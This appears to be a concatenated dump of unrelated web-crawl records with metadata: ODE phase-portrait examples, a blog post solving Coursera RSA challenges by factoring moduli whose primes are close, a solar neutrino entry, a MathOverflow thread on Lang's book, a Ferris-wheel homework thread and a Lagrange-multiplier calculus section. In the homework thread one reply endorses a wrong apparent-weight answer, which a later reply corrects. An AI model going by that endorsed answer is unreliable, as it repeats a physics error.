2.0 Eigenvector 1 : [1.0, 0.0] Eigenvector 2 : [0.0, 1.0] Type of c.p. : Hyperbolic Kind of critical point(s) : unstable node From which we see that the critical points are finite and there are two: $\left[\begin{matrix} 0 & -1 \end{matrix} \right]^\dag$ e $\left[\begin{matrix} 0 & 1 \end{matrix} \right]^\dag$. Furthermore both are hyperbolic and the eigenvalues of the Jacobian matrix computed at the point $\left[\begin{matrix} 0 & -1 \end{matrix} \right]^\dag$ have sign discordant and therefore the first critical point is classified as saddle point while the eigenvalues of the Jacobian matrix calculated at the point $\left[\begin{matrix} 0 & 1 \end{matrix} \right]^\dag$ are both positive, so the second critical point is classified as an unstable node. The phase portrait generated by the program is as follows: The portrait of the phases of example_01.sh. ### Examples #02, #03 and #04 For brevity these three examples are not shown in detail. The shell scripts of these three examples are respectively: example_02.sh  example_03.sh  example_04.sh The phase portraits generated by the program are respectively: The portrait of the phases of example_02.sh. The portrait of the phases of example_03.sh. The portrait of the phases of example_04.sh. ### Example #05 epidemic This example describes a simple model of the spread of an epidemic in a city. Also this example for brevity is not shown in detail; the corresponding shell script is example_05_epidemic.sh The stage portrait generated by the program is as follows: The portrait of the phases of example_05_epidemic.sh. ### Example #06 infected species This example describes the evolution of a population of healthy animals of a species, represented by the variable $x$, and the subpopulation of infected animals, represented by the variable $y$, that never recover once infected, both measured in millions. The shell script for this example is example_06_infected_species.sh. The system consists of the following pair of differential equations: $$$$\begin{cases} x' = (b-d)x - \delta y & b=4, d=1, \delta=6 \\ y' = \tau y (x - y) - (\delta + d) y & \tau = 1 \end{cases}$$$$ In order to study the behavior of such system we execute the command: $python nonlin-auton-plane-sys-hartman-analyzer.py \ --dx_dt "(4.0 - 1.0) * x - 6.0 * y" \ --dy_dt "1.0 * y * (x - y) - (6.0 + 1.0) * y" \ --t_num_of_samples 500 \ --x0_begin 0 --x0_end 20 \ --y0_begin 0 --y0_end 20 whose output is: Critical point(s) : [(0.0, 0.0), (14.0, 7.0)] Formal Jacobian : ⎡ 3.0 -6.0 ⎤ ⎢ ⎥ ⎣1.0⋅y 1.0⋅x - 2.0⋅y - 7.0⎦ ************************* Critical point : (0.0, 0.0) Jacobian at c.p. : ⎡3.0 -6.0⎤ ⎢ ⎥ ⎣0.0 -7.0⎦ Determinant : -21.0 Eigenvalues : 3.0 -7.0 Eigenvector 1 : [1.0, 0.0] Eigenvector 2 : [0.5144957554275265, 0.8574929257125441] Type of c.p. : Hyperbolic Kind of critical point(s) : saddle point ************************* Critical point : (14.0, 7.0) Jacobian at c.p. : ⎡3.0 -6.0⎤ ⎢ ⎥ ⎣7.0 -7.0⎦ Determinant : 21.0 Eigenvalues : (-2+4.12310562j) (-2-4.12310562j) Eigenvector 1 : [(0.52414241+0.43221891j), (0.73379938+0j)] Eigenvector 2 : [(0.52414241-0.43221891j), (0.73379938-0j)] Type of c.p. : Hyperbolic Kind of critical point(s) : stable focus From which we see that the critical points are finite and there are two:$\left[\begin{matrix} 0 & 0 \end{matrix} \right]^\dag$e$\left[\begin{matrix} 14 & 7 \end{matrix} \right]^\dag$. Furthermore both are hyperbolic and the eigenvalues of the Jacobian matrix computed at the point$\left[\begin{matrix} 0 & 0 \end{matrix} \right]^\dag$have sign discordant and therefore the first critical point is classified as saddle point while the eigenvalues of the Jacobian matrix calculated at the point$\left[\begin{matrix} 14 & 7 \end{matrix} \right]^\dag$are conjugate complexes with negative real part, so the second critical point is classified as stable focus. The phase portrait generated by the program is as follows: The portrait of the phases of example_06_infected_species.sh. ### Example #07 competing species This example describes a simple of two competing species in an environment where the common food supply is limited. Also this example for brevity is not shown in detail; the corresponding shell script is example_07_competing_species.sh The stage portrait generated by the program is as follows: The portrait of the phases of example_07_competing_species.sh. ### Example #08 Lotka-Volterra This example describes the dynamics of an ecosystem in which only two animal species interact: one of them as a predator (modeled by the variable$y$), the other as its prey (modeled by the variable$x$) in accordance with the system published by Lotka in 1925 and independently by Volterra in 1926. The shell script for this example is example_08_lotka_volterra.sh. The system consists of the following pair of differential equations: $$$$\begin{cases} x' = x (A - By) & A=\frac{2}{3}, B=\frac{4}{3} \\ y' = y (Cx - D) & C=\frac{9}{10}, D=\frac{9}{10} \end{cases}$$$$ In order to study the behavior of such system we execute the command: $ python nonlin-auton-plane-sys-hartman-analyzer.py \ --dx_dt "x * (0.666 - 1.333 * y)" \ --dy_dt "y * (0.9 * x - 0.9)" \ --t_num_of_samples 500 \ --x0_begin 0 --x0_end 4 \ --y0_begin 0 --y0_end 2 whose output is: Critical point(s) : [(0.0, 0.0), (1.0, 0.499624906226557)] Formal Jacobian : ⎡0.666 - 1.333⋅y -1.333⋅x ⎤ ⎢ ⎥ ⎣ 0.9⋅y 0.9⋅x - 0.9⎦ ************************* Critical point : (0.0, 0.0) Jacobian at c.p. : ⎡0.666 0.0 ⎤ ⎢ ⎥ ⎣ 0.0 -0.9⎦ Determinant : -0.5994 Eigenvalues : 0.666 -0.9 Eigenvector 1 : [1.0, 0.0] Eigenvector 2 : [0.0, 1.0] Type of c.p. : Hyperbolic Kind of critical point(s) : saddle point ************************* Critical point : (1.0, 0.499624906226557) Jacobian at c.p. : ⎡-4.44089209850063e-16 -1.333⎤ ⎢ ⎥ ⎣ 0.449662415603901 0.0 ⎦ Determinant : 0.5994000000000004 Eigenvalues : (0+0.77420927j) (0-0.77420927j) Eigenvector 1 : [(-0.86472998+0j), (0+0.50223704j)] Eigenvector 2 : [(-0.86472998-0j), (0-0.50223704j)] Type of c.p. : Non-hyperbolic So Hartman theorem cannot be applied to this critical point From which we see that the critical points are finite and there are two, but the second one is non-hyperbolic, then the program analyzes only the hyperbolic critical point $\left[\begin{matrix} 0 & 0 \end{matrix} \right]^\dag$ and the eigenvalues of the Jacobian matrix computed at that point have sign discordant and therefore it is classified as saddle point. The phase portrait generated by the program is as follows: The portrait of the phases of example_08_lotka_volterra.sh. ### Example #09 and #10 Holling-Tanner This pair of examples describes like the previous one an ecosystem dynamics in which only two animal species interact: one of them as a predator (modeled by the variable $y$), the other as its prey (modeled by the variable $x$), but following a different system of equations, called the Holling-Tanner system. The shell scripts in this pair of examples are example_09_holling-tanner_0_dot5.sh and example_10_holling_tanner_2dot5.sh. The system consists of the following pair of differential equations: $$$$\begin{cases} x' = x (1 - \frac{x}{7}) - \frac{6xy}{7 + 7x} \\ y' = 0.2 y (1 - \frac{Ny}{x}) \end{cases}$$$$ and the two examples differ only in the constant $N$ which is worth $0.5$ for the former and $2.5$ for the latter. To study the behavior of such a system for $N=0.5$ execute the command: $python nonlin-auton-plane-sys-hartman-analyzer.py \ --dx_dt "x * (1 - x/7) - 6*x*y/(7+7*x)" \ --dy_dt "0.2*y * (1 - (0.5*y)/x)" \ --t_num_of_samples 500 \ --x0_begin 0 --x0_end 8 \ --y0_begin 0 --y0_end 6 whose output is: Critical point(s) : [(-7.0, -14.0), (1.0, 2.0), (7.0, 0.0)] Formal Jacobian : ⎡ 42⋅x⋅y 2⋅x 6⋅y -6⋅x ⎤ ⎢────────── - ─── - ─────── + 1 ─────── ⎥ ⎢ 2 7 7⋅x + 7 7⋅x + 7 ⎥ ⎢(7⋅x + 7) ⎥ ⎢ ⎥ ⎢ 2 ⎥ ⎢ 0.1⋅y 0.2⋅y⎥ ⎢ ────── 0.2 - ─────⎥ ⎢ 2 x ⎥ ⎣ x ⎦ ************************* Critical point : (-7.0, -14.0) Jacobian at c.p. : ⎡3.33333333333333 -1.0⎤ ⎢ ⎥ ⎣ 0.4 -0.2⎦ Determinant : -0.2666666666666668 Eigenvalues : 3.2162457375544835 -0.08291240422114961 Eigenvector 1 : [0.9932149332261002, 0.11629314862309552] Eigenvector 2 : [0.28093063252715217, 0.9597280759193689] Type of c.p. : Hyperbolic Kind of critical point(s) : saddle point ************************* Critical point : (1.0, 2.0) Jacobian at c.p. : ⎡0.285714285714286 -0.428571428571429⎤ ⎢ ⎥ ⎣ 0.4 -0.2 ⎦ Determinant : 0.11428571428571427 Eigenvalues : (0.04285714+0.33533413j) (0.04285714-0.33533413j) Eigenvector 1 : [(0.71919495+0j), (0.40754380-0.56273143j)] Eigenvector 2 : [(0.71919495-0j), (0.40754380+0.56273143j)] Type of c.p. : Hyperbolic Kind of critical point(s) : unstable focus ************************* Critical point : (7.0, 0.0) Jacobian at c.p. : ⎡-1.0 -0.75⎤ ⎢ ⎥ ⎣0.0 0.2 ⎦ Determinant : -0.2 Eigenvalues : -1.0 0.2 Eigenvector 1 : [1.0, 0.0] Eigenvector 2 : [-0.52999894000318, 0.847998304005088] Type of c.p. : Hyperbolic Kind of critical point(s) : saddle point To study the behavior of such a system for$N=2.5$execute the command:: $ python nonlin-auton-plane-sys-hartman-analyzer.py \ --dx_dt "x * (1 - x/7) - 6*x*y/(7+7*x)" \ --dy_dt "0.2*y * (1 - (2.5*y)/x)" \ --t_num_of_samples 500 \ --x0_begin 0 --x0_end 8 \ --y0_begin 0 --y0_end 6 whose output is: Critical point(s) : [(-1.4, -0.56), (5.0, 2.0), (7.0, 0.0)] Formal Jacobian : ⎡ 42⋅x⋅y 2⋅x 6⋅y -6⋅x ⎤ ⎢────────── - ─── - ─────── + 1 ───────⎥ ⎢ 2 7 7⋅x + 7 7⋅x + 7⎥ ⎢(7⋅x + 7) ⎥ ⎢ ⎥ ⎢ 2 ⎥ ⎢ 0.5⋅y y⎥ ⎢ ────── 0.2 - ─⎥ ⎢ 2 x⎥ ⎣ x ⎦ ************************* Critical point : (-1.4, -0.56) Jacobian at c.p. : ⎡4.4 -3.0⎤ ⎢ ⎥ ⎣0.08 -0.2⎦ Determinant : -0.640000000000001 Eigenvalues : 4.347220505424427 -0.14722050542442328 Eigenvector 1 : [0.9998452761917251, 0.017590442777059078] Eigenvector 2 : [0.5506931674648844, 0.8347077544311499] Type of c.p. : Hyperbolic Kind of critical point(s) : saddle point ************************* Critical point : (5.0, 2.0) Jacobian at c.p. : ⎡-0.476190476190476 -0.714285714285714⎤ ⎢ ⎥ ⎣ 0.08 -0.2 ⎦ Determinant : 0.15238095238095234 Eigenvalues : (-0.33809523+0.19512191j) (-0.33809523-0.19512191j) Eigenvector 1 : [(0.94830405+0j), (-0.18333878-0.25904886j)] Eigenvector 2 : [(0.94830405-0j), (-0.18333878+0.25904886j)] Type of c.p. : Hyperbolic Kind of critical point(s) : stable focus ************************* Critical point : (7.0, 0.0) Jacobian at c.p. : ⎡-1.0 -0.75⎤ ⎢ ⎥ ⎣0.0 0.2 ⎦ Determinant : -0.2 Eigenvalues : -1.0 0.2 Eigenvector 1 : [1.0, 0.0] Eigenvector 2 : [-0.52999894000318, 0.847998304005088] Type of c.p. : Hyperbolic Kind of critical point(s) : saddle point The phase portraits generated by the program are as follows: The portrait of the phases of example_09_holling_tanner_0dot5.sh. The portrait of the phases of example_10_holling_tanner_2dot5.sh. ## Bibliography Stephen Lynch Dynamical Systems with Applications using Python Springer 2018
2021-04-12 01:29:32
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 7, "x-ck12": 0, "texerror": 0, "math_score": 0.8923105001449585, "perplexity": 1727.2091633399243}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038065903.7/warc/CC-MAIN-20210411233715-20210412023715-00216.warc.gz"}
http://lixingcong.github.io/2016/04/03/Cryptography-I-week-6/
Question_1 We show that the resulting RSA modulus N=pq can be easily factored. Suppose you are given a composite N and are told that N is a product of two relatively close primes p and q, namely p and q satisfy $$|p-q|<2N^{1/4}\quad (*)$$ Your goal is to factor N. Let A be the arithmetic average of the two primes, that is $$A=\frac{p+q}{2}$$ Since p and q are odd, we know that $p+q$ is even and therefore $A$ is an integer. To factor N you first observe that under condition (*) the quantity $\sqrt{N}$ is very close to $A$. In particular, we show below that: $$A-\sqrt{N}<1$$ For completeness, let us see why $A-\sqrt{N}<1$. This follows from the following simple calculation. First observe that$A^2-N=(\frac{p+q}{2})^2-N=(\frac{p-q}{2})^2=(p-q)^2/4$ Now, we obtain $A-\sqrt{N}=\frac{A^2-N}{A+\sqrt{N}}=\frac{(p-q)^2/4}{A+\sqrt{N}}$ Since $\sqrt{N}\le A$ it follows that $A-\sqrt{N}\le\frac{(p-q)^2/4}{2\sqrt{N}}$ By assumption (*) we know that $(p-q)^2<4\sqrt{N}$ and therefore $A-\sqrt{N}\le \frac{4\sqrt{N}}{8\sqrt{N}}=\frac{1}{2}$ since $A$ is an integer, rounding $\sqrt{N}$ up to the closest integer reveals the value of $A$. In code, $A=ceil(sqrt(N))$ where "ceil" is the ceiling function. Visually, the numbers $p,q,\sqrt{N}$ and $A$ are ordered as follows: There is an integer x such that $p=A−x$ and $q=A+x$. But then $N=pq=(A-x)(A+x)=A^2-x^2$ and therefore $x=\sqrt{A^2-N}$ Now, given $x$ and $A$ you can find the factors p and q of N since $p=A−x$ and $q=A+x$. You have now factored N ! In the following challenges, you will factor the given moduli using the method outlined above. To solve this assignment it is best to use an environment that supports multi-precision arithmetic and square roots. In Python you could use the gmpy2 module. In C you can use GMP. N = "179769313486231590772930519078902473361797697894230657273430081157732675805505620686985379449212982959585501387537164015710139858647833778606925583497541085196591615128057575940752635007475935288710823649949940771895617054361149474865046711015101563940680527540071584560878577663743040086340742855278549092581" $a=\sqrt{N};$ $A=ceil(a);$ $x=\sqrt{A^2-N};$ $p=A-x,q=A+x;$ $output\quad smaller(p,q);$ Question_2 $$|p-q|<2^{11}N^{1/4}$$ $i=ceil(\sqrt{N});$ $for\quad a\quad in\quad i\quad to\quad i+2^{19}:$ $\quad x=\sqrt{a^2-N};$ $\quad p=(a+x);q=(a-x);$ $\quad test\quad if\quad N=pq\quad break;$ $output\quad p,q;$ Question_3 $$|3p-2q|< N^{1/4}$$ $a=\sqrt{24N};$ $A=ceil(a);$ $x=\sqrt{A^2-24N};$ $p=\frac{A-x}{6},q=\frac{A+x}{4};$ $output\quad smaller(p,q);$ Question_4 The challenge ciphertext provided below is the result of encrypting a short secret ASCII plaintext using the RSA modulus given in the first factorization challenge. The encryption exponent used is $e=65537$. The ASCII plaintext was encoded using PKCS v1.5 before the RSA function was applied, as described in PKCS. Use the factorization you obtained for this RSA modulus to decrypt this challenge ciphertext and enter the resulting English plaintext in the box below. Recall that the factorization of N enables you to compute $\phi(N)$ from which you can obtain the RSA decryption exponent. Challenge ciphertext (as a decimal integer): 220964518674103817763065611348834180174100697878928232...... After you use the decryption exponent to decrypt the challenge ciphertext you will obtain a PKCS1 encoded plaintext. To undo the encoding it is best to write the decrypted value in hex. You will observe that the number starts with a '0x02' followed by many random non-zero digits. Look for the '0x00' separator and the digits following this separator are the ASCII letters of the plaintext. $fi=(p-1)(q-1);$ $d=invert(e)\pmod{fi};$ $PlainText=(CipherText)^d\pmod{N};$ $PlainText_h=dec2hex(PlainText);$ $index=PlainText_h.find(0\times00);$ $output\quad PlainText_h[index:;];$ mpz_get_str(PlainText,16,mpz_t_PT); //转成16为底的字符串 程序源码 Question_1 13407807929942597099574024998205846127479365820592393377723561443721764030073662768891111614362326998675040546094339320838419523375986027530441562135724301 Question_2 25464796146996183438008816563973942229341454268524157846328581927885777969985222835143851073249573454107384461557193173304497244814071505790566593206419759 Question_3 21909849592475533092273988531583955898982176093344929030099423584127212078126150044721102570957812665127475051465088833555993294644190955293613411658629209 Question_4 Factoring lets us break RSA. 结束语 Week6就要结束了,这门课就完成了,接下来还有Cryptography II,很是期待。
2022-11-27 18:50:57
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8636883497238159, "perplexity": 537.7654410632423}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710417.25/warc/CC-MAIN-20221127173917-20221127203917-00507.warc.gz"}
https://www.chemeurope.com/en/encyclopedia/Solar_neutrino.html
My watch list my.chemeurope.com # Solar neutrino Electron neutrinos are produced in the sun as a product of nuclear fusion. This is known as the proton-proton chain reaction. The net reaction is: $4 p + 2e = He + 2 \nu_e \!\$, or in words: 4 protons + 2 electrons = Helium + 2 electron neutrinos. Neutrinos from the proton-proton process have energy up to 400 keV. There are also several other significant production mechanisms, with energies up to 10 MeV. [1] The number of neutrinos can be predicted by the standard model. The detected number of electron neutrinos was only a 1/3 of the predicted number, this is known as the solar neutrino problem. This led to the idea of neutrino oscillations and the fact that neutrinos can change flavour. This was confirmed when the total flux of solar neutrinos of all types was measured and it agreed with the earlier predictions of expected electron neutrino flux. This effectively proved that neutrinos have mass as only massive particles can change flavour.
2023-03-26 05:03:38
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 1, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8240252137184143, "perplexity": 552.370028379904}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945433.92/warc/CC-MAIN-20230326044821-20230326074821-00062.warc.gz"}
http://mathoverflow.net/questions/131053/differentiable-manifolds-by-serge-lang-question
# Differentiable manifolds by Serge Lang question I have started reading "Introduction to differentiable manifolds" by Serge Lang. In this book, Lang takes a different approach, by immediately introducing manifolds on arbitrary Banach spaces. His approach uses little to no multilinear algebra and he states the following in the foreword: "The orgy of multilinear algebra in standard treatises arises from unnecessary double dualization and an abusive use of the tensor product." What exactly does he mean by this? Is there something inelegant about the traditional treatment of finite dimensional manifolds and differential forms on them? - It depends on what you mean by "traditional treatment". There are in fact many different "traditional treatments" of tensors on manifolds, and some of them are indeed quite messy. –  Deane Yang May 18 '13 at 14:58 Maybe this is just me, but from my experience as a grad student, I would suggest using a different book, unless you are already familiar with finite dimensional manifolds, or interested mainly in a few very general notions. I.e. I did not find that book a useful place to begin. If you too are a beginner, people like the books by Michael Spivak and John Lee. I see now that Lang expanded the book more than double (by adding finite dimensional topics), over the 1st edition which consisted mostly of theorems on differential equations now found in chapters IV and VI. So it is now a hybrid. –  roy smith May 18 '13 at 15:15 I second Roy's comment. Lang's book is suitable (but not necessarily the best) only if you are already familiar with finite-dimensional manifolds and have a specific need for learning about infinite-dimensional manifolds. Even then, it might be easier to focus first only on the specific infinite-dimensional spaces that you want to work with, rather than learning the general theory first. –  Deane Yang May 18 '13 at 15:27 ## 1 Answer I'm not sure what Lang had in mind with "unnecessary double dualization", but here's an example that occurred to me in ancient times when I was trying to understand differential geometry better. Some (many? most?) people define tangent vectors to a manifold to be certain derivations on the smooth functions, and they define the cotangent space to be the dual of the tangent space. So a cotangent vector is a function taking as arguments tangent vectors, which are themselves functions taking as arguments smooth functions. In this sense, a cotangent vector is a doubly-dualized function. But one can avoid these dualizations by defining a cotangent vector at a point $p$ to be an element of $m/(m^2)$ where $m$ is the maximal ideal in the ring of germs of smooth functions at $p$. In other words, $m$ consists of the smooth germs that vanish at $p$ and $m^2$ consists of those that vanish to second order, so the quotient is "first-order data about a germ at $p$, omitting the value (zero-order data) at $p$." That picture captures pretty well my intuition of what a cotangent vector should be. (I think that the $m/(m^2)$ definition is used more in algebraic geometry than in differential geometry.) -
2015-09-02 06:35:34
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8322886824607849, "perplexity": 353.5918197042958}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-35/segments/1440645257890.57/warc/CC-MAIN-20150827031417-00059-ip-10-171-96-226.ec2.internal.warc.gz"}
https://www.physicsforums.com/threads/circular-motion-of-a-ferris-wheel.637547/
Circular Motion of a Ferris wheel Homework Statement An Ferris Wheel has a radius of 16m and rotates once every 20 seconds. a) Find Centripedal acceleration. b) Whats the effektive wheight of a 45 kg person at highest point? c) Lowest point? Homework Equations a) I tried using the a=ω2*r in a) but not sure if its right b) c) We = mg - ma Is this the correct equation for a and b? The Attempt at a Solution I got out 1,578m*s-2 in a) but not sure if thats correct really. and also strugling with b) and c) But heres c) atleast trying using that equation: 45kg*9,82m*s-2 - 45kg*1,578m*s-2= 370,89N Is that right? and b) do i use same equation for upward motion? Last edited: Answers and Replies Related Introductory Physics Homework Help News on Phys.org for a you should end up with an acceleration, not a velocity a=ω^2*r works but you need the correct value of omega, what did you use? b and c are just adding up the forces acting at those points. Just make sure you have a good understanding of which direction the centripetal force is directed. Oh yeah it was -2 not -1. Spelling error. I Used for omega, ω = $\frac{(2π*3)}{60}$ The motions are up and down verticaly, but not sure if that formula is right or if i need to add other things to it well, basically the centripetal force is always pointing towards the center of the circle, and the force due to gravity is always pointed downwards. So at the top, they are pointed in the same direction, at the bottom they are pointed in opposite directions. So how would you find the net force acting on someone at the top and then at the bottom? well, basically the centripetal force is always pointing towards the center of the circle, and the force due to gravity is always pointed downwards. So at the top, they are pointed in the same direction, at the bottom they are pointed in opposite directions. So how would you find the net force acting on someone at the top and then at the bottom? Well when going upward you add weight since your pushed "into the seat", and down you take weight when the seat accelerate away from you. So it would be F = mg+ma at the top since its "added weight" 45kg*9,82m/s^2+45*1,578m/s^2= 512,91N And when you go down it will be the same but with (-): 45kg*9,82m/s^2-45*1,578m/s^2 = 370,89N Or is this as wrong as I can get? I'm new to this things so I might not be so good at it. yeah that looks correct Okey thanks for the help! PhanthomJay Science Advisor Homework Helper Gold Member Well when going upward you add weight since your pushed "into the seat", and down you take weight when the seat accelerate away from you. So it would be F = mg+ma at the top since its "added weight" 45kg*9,82m/s^2+45*1,578m/s^2= 512,91N And when you go down it will be the same but with (-): 45kg*9,82m/s^2-45*1,578m/s^2 = 370,89N Or is this as wrong as I can get? I'm new to this things so I might not be so good at it. This is not correct. The person's effective or 'apparent' weight is the magnitude of the normal force of the seat that pushes up on him or her. The person feels lighter at the top than at the bottom. Use good free body diagrams and newton's 2nd law to find the normal force at the top, and then at the bottom.
2020-01-22 13:23:58
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7150348424911499, "perplexity": 643.9149639228048}, "config": {"markdown_headings": false, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-05/segments/1579250607118.51/warc/CC-MAIN-20200122131612-20200122160612-00323.warc.gz"}
https://opentext.uleth.ca/apex-standard/sec-multi_extreme_further.html
# APEX Calculus: for University of Lethbridge ## Section14.7Constrained Optimization and Lagrange Multipliers Let us continue our discussion of constrained optimization begun in Section 14.5. Theorem 14.5.19 tells us that the Extreme Value Theorem extends to functions of two variables; in fact, this is true for a function of any number of variables: if a real-valued function $$f$$ is continuous on a closed, bounded subset of $$\mathbb{R}^n\text{,}$$ then it is guaranteed to have an absolute maximum and minimum. However, as the number of variables increases, the job of finding these absolute extrema becomes more and more complicated. We saw one approach in Section 14.5: given a continuous function on a closed, bounded region $$D\text{,}$$ we first consider critical values on the interior of $$D\text{.}$$ We then restrict our function $$f$$ to points on the boundary of $$D\text{,}$$ and attempt to reduce the problem to optimization in one variable. In many cases, this approach is best accomplished by parametrizing the boundary. We learned how to define parametric curves in the plane in Section 9.2. ### Example14.7.1.Constrained optimization by parametrization. Find the absolute maximum and minimum values of $$f(x,y) = x^2-8x-3y^2$$ on the disc $$x^2+y^2\leq 4\text{.}$$ Solution. First, we check for critical points: We have \begin{equation*} \nabla f(x,y) = \la 2x-8,-6y\ra\text{,} \end{equation*} which vanishes when $$(x,y) = (4,0)\text{.}$$ This critical point is outside our region, so we do not consider it. Next, we look for extreme values on the boundary. The boundary of our region is the circle $$x^2+y^2=4\text{,}$$ which we can parametrize using $$x=2\cos t\text{,}$$ $$y=2\sin t\text{,}$$ for $$t\in [0,2\pi]\text{.}$$ For $$(x,y)$$ on the boundary, we have \begin{equation*} f(x,y) = x^2-8x-3y^2 = 4\cos^2t-16\cos t-12\sin^2t = h(t)\text{,} \end{equation*} a function of one variable, with domain $$[0,2\pi]\text{.}$$ We learned how to find the extreme values of such a function back in our first course in calculus: see Section 3.1. We have $$h(0)=h(2\pi)=-12\text{,}$$ and \begin{equation*} h'(t) = -8\cos t\sin t+16\sin t-24\sin t\cos t = 16\sin t (1-2\cos t)\text{.} \end{equation*} Thus, $$h'(t)=0$$ if $$\sin t = 0$$ ($$t=0,\pi,2\pi$$) or $$\cos =\frac12$$ ($$t=\pi/3, 5\pi/3$$). We have already checked that $$h(0)=h(2\pi)=-12\text{,}$$ so we check the remaining points: \begin{align*} h(\pi) \amp = 4(-1)^2-16(-1) = 20\\ h(\pi/3)=h(5\pi/3) \amp = 4\left(\frac14\right)-16\left(\frac{1}{2}\right)-12\left(\frac34\right) = -16\text{.} \end{align*} We see that the absolute maximum is when $$t=\pi\text{:}$$ $$h(\pi) = f(-2,0)=20\text{,}$$ and the absolute minimum is $$-16\text{,}$$ which occurs when $$t=\pi/3$$ and $$t=5\pi/3\text{,}$$ corresponding to the points $$(1,\sqrt{3})$$ and $$(1,-\sqrt{3})\text{,}$$ respectively. The above method works well, when it's straightforward to set up. The advantage is that it reduces the problem of optimization along the boundary to an optimization problem in one variable, which is something we mastered long ago. One downside is that it is not always easy to come up with a parametrization for a curve. In the above example, the boundary $$x^2+y^2=4$$ is a level curve: it's of the form $$g(x,y)=c\text{.}$$ When we're trying to optimize subject to a constraint of this form, there is another approach, called the method of Lagrange multipliers. Suppose we are trying to maximize a function $$f(x,y)$$ subject to a constrain $$g(x,y)=c\text{.}$$ We could follow the approach given above: find a function $$\vec{r}: [a,b]\to \mathbb{R}^2$$ that parametrizes the curve $$g(x,y)=c\text{.}$$ As we saw above, the maximum (or minimum) should occur at some point $$t_0$$ that is a critical number of $$h(t)=f(\vec{r}(t))\text{;}$$ that is, such that \begin{equation*} h'(t_0)=\nabla f(\vec{r}(t_0))\cdot \vrp (t_0) = 0\text{.} \end{equation*} This tells us that the gradient $$\nabla f$$ should be orthogonal to the constraint curve $$g(x,y)=c$$ at the point $$(x_0,y_0)=(x(t_0),y(t_0))\text{.}$$ But we know another gradient that is orthogonal to this curve: $$\nabla g\text{!}$$ Recall from Theorem 14.3.9 that $$\nabla g(x,y)$$ is always orthogonal to the level curve $$g(x,y)=c$$ at points along the curve. Let's sum up: the vectors $$\nabla f(x_0,y_0)$$ and $$\nabla g(x_0,y_0)$$ are both orthogonal to the vector 